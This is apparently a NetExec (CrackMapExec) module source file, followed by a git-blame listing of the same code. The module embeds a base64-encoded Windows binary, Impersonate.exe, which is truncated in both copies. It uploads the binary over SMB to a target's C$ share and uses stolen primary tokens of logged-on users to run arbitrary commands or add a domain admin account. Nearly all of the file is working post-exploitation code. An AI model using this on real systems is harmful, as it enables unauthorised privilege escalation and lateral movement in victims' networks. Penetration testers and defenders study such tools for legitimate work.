NetExec/cme/modules/impersonate.py

from base64 import b64decode

class CMEModule:

    name = "impersonate"
    description = "List and impersonate tokens to run command as locally logged on users"
    supported_protocols = ["smb"]
    opsec_safe = True # could be flagged
    multiple_hosts = True

    def options(self, context, module_options):
        '''
            MODULE    // Module to use (adduser or exec)
            TOKEN     // Token id to usurp
            CMD       // Command to exec
        '''

        self.tmp_dir = "C:\\Windows\\Temp\\"
        self.share = "C$"
        self.tmp_share = self.tmp_dir.split(":")[1]
        self.impersonate = "Impersonate.exe"
        self.module = self.token = self.cmd = ""
        self.impersonate_embedded = b64decode("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA/offYe8CZi3vAmYt7wJmLb6udinDAmYtvq5qKfsCZi2+rnIrxwJmLKbWcil7AmYsptZ2Ka8CZiym1mopywJmLb6uYinLAmYt7wJiLEcCZi7q1kIp6wJmLurVmi3rAmYu6tZuKesCZi1JpY2h7wJmLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAGSGBwAfuFpjAAAAAAAAAADwACIACwIOHQAsAQAA6gAAAAAAAJAgAAAAEAAAAAAAQAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAYAIAAAQAAAAAAAADAGCBAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAyOIBAGQAAAAAQAIA4AEAAAAQAgDIEAAAAAAAAAAAAAAAUAIAaAYAAPDOAQBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYM8BADgBAAAAAAAAAAAAAABAAQDwAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAACAKgEAABAAAAAsAQAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAAq0AAABAAQAArgAAADABAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAADAdAAAA8AEAAAwAAADeAQAAAAAAAAAAAAAAAABAAADALnBkYXRhAADIEAAAABACAAASAAAA6gEAAAAAAAAAAAAAAAAAQAAAQF9SREFUQQAA/AAAAAAwAgAAAgAAAPwBAAAAAAAAAAAAAAAAAEAAAEAucnNyYwAAAOABAAAAQAIAAAIAAAD+AQAAAAAAAAAAAAAAAABAAABALnJlbG9jAABoBgAAAFACAAAIAAAAAAIAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiNBQn9AQDDzMzMzMzMzMxIiUwkCEiJVCQQTIlEJBhMiUwkIFNWV0iD7DBIi/lIjXQkWLkBAAAA6DsvAABIi9jou////0UzyUiJdCQgTIvHSIvTSIsI6EFjAABIg8QwX15bw8zMzMzMzMzMzMzMzMxAVUiNrCQwfP7/uNCEAQDoXCQBAEgr4EiLBXrfAQBIM8RIiYWggwEASIlUJGiJTCRgg/kCD4xmDAAASImcJOCEAQBIibwk+IQBAP8VwC8BADPSuf//HwBEi8D/FfAvAQBMjUWguigAAABIi8hIi/j/FVsvAQBIi02gSI1FgEUzyUiJRCQgRTPAQY1RGf8VXi8BAItVgDPJ/xXDLwEARItNgLoZAAAASItNoEiL2EiNRYBMi8NIiUQkIP8VMS8BAEiLC/8V6C4BAA+2CP7JD7bRSIsL/xXfLgEAiwCJRCRkPQAwAABzCrgBAAAA6foHAABIibQk8IQBAEyNRShMiaQkyIQBAEiNFR27AQBMiawkwIQBADPJTIm0JLiEAQBMibwksIQBAP8VZS4BAEiLRShMjUUASItNoEG/AQAAADPbRIl9AEiJXCQoM9JIiUUERY1PD8dFDAIAAABIiVwkIP8VNC4BAEyNRTAzyUiNFfe6AQD/FRkuAQBIi0UwRY1PD0iLTaBMjUUASIlcJCgz0kiJRQREiX0Ax0UMAgAAAEiJXCQg/xXwLQEASIvP/xV3LgEASItNoP8VbS4BAP8VTy4BAIvISI1V+P8Vey4BADP/SI0N2roBAIl97ESL7/8VHi4BAEiLyEiNFaS6AQD/FSYuAQBIi9j/FQ0uAQCNVwhBuAAAoABIi8j/FRMuAQBMjU3sQbgAAKAAjU8QSIlEJHhIi9BMi/D/00SL50E5Pg+GDQYAAEiNjbAAAABIiUwkcJBBi8Qz0kiNDEBBDxBMzgjyQQ8QRM4YjUpAZg9+yA8RTRBED7fA8g8RRSD/FeAtAQBMi/BIg/j/dQ5Ii8j/FaYtAQDpqAUAAP8V4y0BAA+3VRZMjU2ox0QkMAIAAABMi8CJfCQoSYvOiXwkIP8Vpy0BAIXAdQ5Ji87/FWotAQDpbAUAALkAIAAA6FtiAABIi3WouRAAAADHRegQAAAA6EZiAABEi03oSIvYSI1F6EyLw7oCAAAASIlEJCBIi87/FW0vAQA9BQAAgHQHPQQAAMB1LItV6EiLy+hgNwAARItN6EiL2EiNRehMi8O6AgAAAEiJRCQgSIvO/xUzLwEAhcB4J0iDewgAdCAPtwu6AgAAAOiLKgAARA+3A0iLyEiLUwhIi/joCCAAAEiLy+ikYQAAM9tIjRVHuQEAi8sPH0QAAA+3BE9I/8FmO0RK/g+FiAQAAEiD+QZ16EiLTahIjUWERTPJSImNsHcBAEUzwEiJRCQgQYvXx0XwAAIAAMdF6B4AAAD/FScsAQCFwA+FpAAAAItVhI1IQP8VUywBAESLTYRBi9dIi42wdwEASIvYSI1FhEyLw0iJRCQg/xXwKwEAhcB0cUiLE0iNRZhIiUQkMEyNTfBIjUXoM8lIiUQkKEyNhYB/AQBIjUWwSIlEJCD/FbMrAQBIjYWAfwEAug8BAABMjU2wSIlEJCBMjQXPtgEASI2NgIEBAOhTCAAATI2FgIEBALoeAAAASI2NwHcBAOgPNgAASIuNsHcBAEiNRYhFM8lIiUQkIEUzwEGNUQr/FVsrAQCFwHV1i1WIjUhA/xWLKwEARItNiLoKAAAASIuNsHcBAEiL2EiNRYhMi8NIiUQkIP8VJisBAIXAdECLQxhBO8d1HUiNNQO3AQC6HgAAAEyLxkiNjd55AQDokzUAAOsig/gCdRZMjQUBtwEAjVAcSI2N3nkBAOh2NQAASI01y7YBAEiLjbB3AQBIjUWMRTPJSIlEJCBFM8BBjVEM/xW7KgEAhcB1QYtVjI1IQP8V6yoBAESLTYxIjUWMSIuNsHcBAEyNRfS6DAAAAEiJRCQg/xWIKgEAi428dwEAhcAPRU30iY28dwEASI2V3nkBAEjHwf////8PH4QAAAAAAA+3REoCZjtETgJ1FEiDwQJIg/kNdHcPtwRKZjsETnTgSIuNsHcBAEiNRZBFM8lIiUQkIEUzwEGNUQn/FSAqAQCFwA+FhgAAAItVkI1IQP8VTCoBAESLTZC6CQAAAEiLjbB3AQBIi9hIjUWQTIvDSIlEJCD/FecpAQCFwHRRiwOD+AJ1EkyNBRW1AQDrMEyNBai2AQDrJ4P4A3UJTI0FLrUBAOsZhcB1CUyNBUm1AQDrDEE7x3UYTI0FY7UBALoeAAAASI2NpnoBAOgmNAAAM/9Ei9dFhe0PiLcAAABBjUUBTGPYTI2N3gIAAGYPH0QAAEmNgeL9//9MjYXAdwEATCvAD7cQQg+3DAAr0XUISIPAAoXJdeyF0nVhTI2F3nkBAEmLwU0rwWZmDx+EAAAAAAAPtxBCD7cMACvRdQhIg8AChcl17IXSdTJJjYHIAAAATI2FpnoBAEwrwA8fgAAAAAAPtxBCD7cMACvRdQhIg8AChcl17IXSRQ9E10mBwcADAABNK98PhWb///9FhdIPhewAAABIjZXeeQEASMfB/////w8fQABmZmYPH4QAAAAAAA+3REoCZjtETgIPhb8AAABIg8ECSIP5DXQYD7cESmY7BE503EmLzv8VuygB

        if "MODULE" in module_options:
            if module_options["MODULE"] in ("adduser", "list", "exec"):
                self.module = module_options["MODULE"]
            else:
                context.log.error(f"Invalid module name")
                return 
            if "TOKEN" in module_options and "CMD" in module_options:
                self.token = module_options["TOKEN"]
                self.cmd = module_options["CMD"]
        else:
            context.log.error(f"Invalid module, choose between list, adduser and exec")

    def list_available_primary_tokens(self, _, connection):
        command = f"{self.tmp_dir}Impersonate.exe list"
        return connection.execute(command, True)
        
    def on_admin_login(self, context, connection):

        with open("/tmp/Impersonate.exe", 'wb') as impersonate:
            impersonate.write(self.impersonate_embedded)

        context.log.info(f"Uploading {self.impersonate}")
        with open("/tmp/Impersonate.exe", 'rb') as impersonate:
            try:
                connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)
                context.log.success(f"Impersonate binary successfully uploaded")
            except Exception as e:
                context.log.error(f"Error writing file to share {self.tmp_share}: {e}")
                return

        try:
            if self.module == "list":
                context.log.info(f"Listing available primary tokens")
                p = self.list_available_primary_tokens(context, connection)
                for line in p.splitlines():
                    token, token_owner = line.split(" ", 1)
                    context.log.highlight(f"Primary token ID: {token} {token_owner}")
            else:
                impersonated_user = ""
                p = self.list_available_primary_tokens(context, connection)
                for line in p.splitlines():
                    token_id, token_owner = line.split(" ", 1)
                    if token_id == self.token:
                        impersonated_user = token_owner.strip()
                        break

                if impersonated_user:  
                    if self.module == "adduser":
                        context.log.info(f"Escalating domain admin impersonating {impersonated_user}")
                        method = "wmiexec"
                    if self.module == "exec":
                        context.log.info(f"Executing {self.cmd} as {impersonated_user}")
                        method="smbexec"
                    command = f"{self.tmp_dir}Impersonate.exe {self.module} {self.token} \"{self.cmd}\""
                    for line in connection.execute(command, True, methods=[method]).splitlines():
                        context.log.highlight(line)
                else:
                    context.log.error(f"Invalid token ID submitted")

        except Exception as e:
            context.log.error(f"Error runing command: {e}")
        finally:
            try:
                connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")
                context.log.success(f"Impersonate binary successfully deleted")
            except Exception as e:
                context.log.error(f"Error deleting Impersonate.exe on {self.share}: {e}")
Final update! 2022-10-27 10:21:46 +00:00			`from base64 import b64decode`
Add files via upload 2022-07-04 12:44:35 +00:00
			`class CMEModule:`

			`name = "impersonate"`
			`description = "List and impersonate tokens to run command as locally logged on users"`
			`supported_protocols = ["smb"]`
			`opsec_safe = True # could be flagged`
			`multiple_hosts = True`

			`def options(self, context, module_options):`
			`'''`
Final update! 2022-10-27 10:21:46 +00:00			`MODULE // Module to use (adduser or exec)`
			`TOKEN // Token id to usurp`
			`CMD // Command to exec`
Add files via upload 2022-07-04 12:44:35 +00:00			`'''`

			`self.tmp_dir = "C:\\Windows\\Temp\\"`
			`self.share = "C$"`
			`self.tmp_share = self.tmp_dir.split(":")[1]`
			`self.impersonate = "Impersonate.exe"`
Final update! 2022-10-27 10:21:46 +00:00			`self.module = self.token = self.cmd = ""`
Update impersonate.py Adding double quotes for spaced cmd 2022-10-27 16:57:00 +00:00			self.impersonate_embedded = b64decode("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
Add files via upload 2022-07-04 12:44:35 +00:00
Final update! 2022-10-27 10:21:46 +00:00			`if "MODULE" in module_options:`
			`if module_options["MODULE"] in ("adduser", "list", "exec"):`
			`self.module = module_options["MODULE"]`
			`else:`
			`context.log.error(f"Invalid module name")`
			`return`
			`if "TOKEN" in module_options and "CMD" in module_options:`
			`self.token = module_options["TOKEN"]`
			`self.cmd = module_options["CMD"]`
			`else:`
			`context.log.error(f"Invalid module, choose between list, adduser and exec")`
Add files via upload 2022-07-04 12:44:35 +00:00
Update impersonate.py 2022-07-09 16:34:35 +00:00			`def list_available_primary_tokens(self, _, connection):`
Final update! 2022-10-27 10:21:46 +00:00			`command = f"{self.tmp_dir}Impersonate.exe list"`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`return connection.execute(command, True)`

Add files via upload 2022-07-04 12:44:35 +00:00			`def on_admin_login(self, context, connection):`

			`with open("/tmp/Impersonate.exe", 'wb') as impersonate:`
			`impersonate.write(self.impersonate_embedded)`

			`context.log.info(f"Uploading {self.impersonate}")`
			`with open("/tmp/Impersonate.exe", 'rb') as impersonate:`
			`try:`
			`connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`context.log.success(f"Impersonate binary successfully uploaded")`
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
			`context.log.error(f"Error writing file to share {self.tmp_share}: {e}")`
			`return`

			`try:`
Final update! 2022-10-27 10:21:46 +00:00			`if self.module == "list":`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`context.log.info(f"Listing available primary tokens")`
			`p = self.list_available_primary_tokens(context, connection)`
Add files via upload 2022-07-04 12:44:35 +00:00			`for line in p.splitlines():`
Final update! 2022-10-27 10:21:46 +00:00			`token, token_owner = line.split(" ", 1)`
			`context.log.highlight(f"Primary token ID: {token} {token_owner}")`
Add files via upload 2022-07-04 12:44:35 +00:00			`else:`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`impersonated_user = ""`
			`p = self.list_available_primary_tokens(context, connection)`
			`for line in p.splitlines():`
			`token_id, token_owner = line.split(" ", 1)`
Final update! 2022-10-27 10:21:46 +00:00			`if token_id == self.token:`
			`impersonated_user = token_owner.strip()`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`break`
Final update! 2022-10-27 10:21:46 +00:00
			`if impersonated_user:`
			`if self.module == "adduser":`
			`context.log.info(f"Escalating domain admin impersonating {impersonated_user}")`
			`method = "wmiexec"`
			`if self.module == "exec":`
			`context.log.info(f"Executing {self.cmd} as {impersonated_user}")`
			`method="smbexec"`
Update impersonate.py Adding double quotes for spaced cmd 2022-10-27 16:57:00 +00:00			`command = f"{self.tmp_dir}Impersonate.exe {self.module} {self.token} \"{self.cmd}\""`
Final update! 2022-10-27 10:21:46 +00:00			`for line in connection.execute(command, True, methods=[method]).splitlines():`
			`context.log.highlight(line)`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`else:`
			`context.log.error(f"Invalid token ID submitted")`

Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
			`context.log.error(f"Error runing command: {e}")`
			`finally:`
			`try:`
			`connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.success(f"Impersonate binary successfully deleted")`
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.error(f"Error deleting Impersonate.exe on {self.share}: {e}")`